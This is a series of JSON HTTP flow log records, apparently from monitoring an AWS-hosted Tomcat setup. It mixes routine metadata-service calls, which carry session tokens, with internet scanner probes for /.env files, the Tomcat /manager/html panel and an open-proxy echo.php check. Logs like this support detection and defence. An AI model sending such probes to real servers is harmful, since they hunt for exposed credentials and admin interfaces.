{"endtime":"2022-04-06T10:47:22.496906Z","timestamp":"2022-04-06T10:47:22.496906Z","bytes":254,"bytes_in":254,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"7dc9a76f-0c50-4d3d-815a-8797aa7e0065","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n","src_ip":"178.32.197.81","src_mac":"02:A5:92:DA:49:85","src_port":39219,"time_taken":154489,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T10:14:43.802837Z","timestamp":"2022-04-06T10:14:43.802837Z","bytes":205,"bytes_in":205,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"360ff275-df0e-4e2a-8f40-8a649faaa256","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 ","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 \r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"185.180.143.137","src_mac":"02:A5:92:DA:49:85","src_port":47540,"time_taken":150064,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T10:11:42.456018Z","timestamp":"2022-04-06T10:11:42.455804Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 10:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"4065caac-65ec-4cd1-ba90-169fc88f9099","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rloMtAuWJAl8x8Rj_euHzV1DshFLTPF3NylS3DiUUO0SLg==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":41480,"status":404,"time_taken":222,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T10:11:42.454943Z","timestamp":"2022-04-06T10:11:42.454531Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 09:19:58 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 10:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"578b930a-ee4b-434e-93df-0dc6d9957d0e","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rlpISY2KKWq4mdAIyZ2OUwoXcHsMFj0Jl1Jpcr8sQ60VEw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":41476,"status":200,"time_taken":420,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T10:02:06.085477Z","timestamp":"2022-04-06T10:02:06.085287Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 10:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"1879d9e1-f797-437f-bff7-a2c90d1d6e45","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":58820,"status":404,"time_taken":200,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T10:02:06.084804Z","timestamp":"2022-04-06T10:02:06.084528Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 09:00:14 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 10:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"04777de2-3b40-41bd-90dc-1f4b11b34ee1","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":58818,"status":200,"time_taken":298,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T10:01:59.876107Z","timestamp":"2022-04-06T10:01:59.875906Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 10:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"b7db8427-b5fa-441e-a7a8-cd78ada40fde","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":47192,"status":404,"time_taken":223,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T10:01:59.875091Z","timestamp":"2022-04-06T10:01:59.874835Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 09:36:37 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 10:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"292b9fd9-b8a6-426d-b320-9589d8b36d1b","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":47190,"status":200,"time_taken":306,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T09:57:18.234177Z","timestamp":"2022-04-06T09:57:18.234177Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"ebccf6eb-d861-4465-a4f5-d67b720ad730","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":55898,"time_taken":169345,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T09:57:16.883441Z","timestamp":"2022-04-06T09:57:16.881813Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 09:57:16 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"dc224365-9b5f-4ff3-856d-329b448dbd6f","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.61.187.129","src_mac":"02:A5:92:DA:49:85","src_port":42010,"status":404,"time_taken":86569,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T09:45:11.480034Z","timestamp":"2022-04-06T09:45:11.480034Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"f5c85033-d98f-4c66-9bb2-ea4f1beb299a","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.218","src_mac":"02:A5:92:DA:49:85","src_port":51766,"time_taken":178160,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T09:15:59.919204Z","timestamp":"2022-04-06T09:15:59.917864Z","bytes":2208,"bytes_in":114,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 09:15:59 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"85526475-57a9-4fa2-ba2b-c77675ca519e","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 zgrab/0.x","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"192.241.224.183","src_mac":"02:A5:92:DA:49:85","src_port":44566,"status":200,"time_taken":23239,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T09:15:25.695657Z","timestamp":"2022-04-06T09:15:25.694262Z","bytes":1608,"bytes_in":361,"bytes_out":1247,"cookie":"cookie=ok","cs_content_length":0,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /echo.php

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1091\r\nDate: Wed, 06 Apr 2022 09:15:25 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1091,"flow_id":"111fe750-7990-4af1-a54c-85b769d6439d","http_comment":"HTTP/1.1 404 ","http_content_length":1091,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_referrer":"https://www.google.com/","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET http://5.188.210.227/echo.php HTTP/1.1","site":"5.188.210.227","src_headers":"GET http://5.188.210.227/echo.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nPragma: no-cache\r\nCache-control: no-cache\r\nCookie: cookie=ok\r\nReferer: https://www.google.com/\r\nHost: 5.188.210.227\r\nConnection: close\r\nContent-Length: 0\r\n\r\n","src_ip":"5.188.210.227","src_mac":"02:A5:92:DA:49:85","src_port":58160,"status":404,"time_taken":196666,"transport":"tcp","uri":"/echo.php","uri_path":"/echo.php"} {"endtime":"2022-04-06T09:11:42.453554Z","timestamp":"2022-04-06T09:11:42.453283Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 09:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"9e3fdebc-1379-47e4-9801-f65816bb434a","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":40062,"status":404,"time_taken":280,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T09:11:42.452806Z","timestamp":"2022-04-06T09:11:42.452365Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 08:21:20 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 09:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"8c17f3b1-bd10-43b0-a035-28354f217f49","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":40060,"status":200,"time_taken":461,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T09:02:06.085634Z","timestamp":"2022-04-06T09:02:06.085463Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 09:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"973de9d1-1ed5-4e8f-ac30-4a2aaaab66ce","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":32808,"status":404,"time_taken":188,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T09:02:06.084567Z","timestamp":"2022-04-06T09:02:06.084367Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 09:00:14 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 09:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"011939c2-1af5-4d32-833f-02b7d492df23","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":32804,"status":200,"time_taken":217,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T09:01:59.876876Z","timestamp":"2022-04-06T09:01:59.876694Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 09:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"a64d18d9-3260-4cc6-b4a0-bb52e3d5785b","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":45778,"status":404,"time_taken":204,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T09:01:59.875338Z","timestamp":"2022-04-06T09:01:59.875140Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 08:35:16 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 09:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"3390932e-1368-4e03-a3f4-f43483557590","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":45774,"status":200,"time_taken":215,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T08:59:05.479885Z","timestamp":"2022-04-06T08:59:05.478529Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

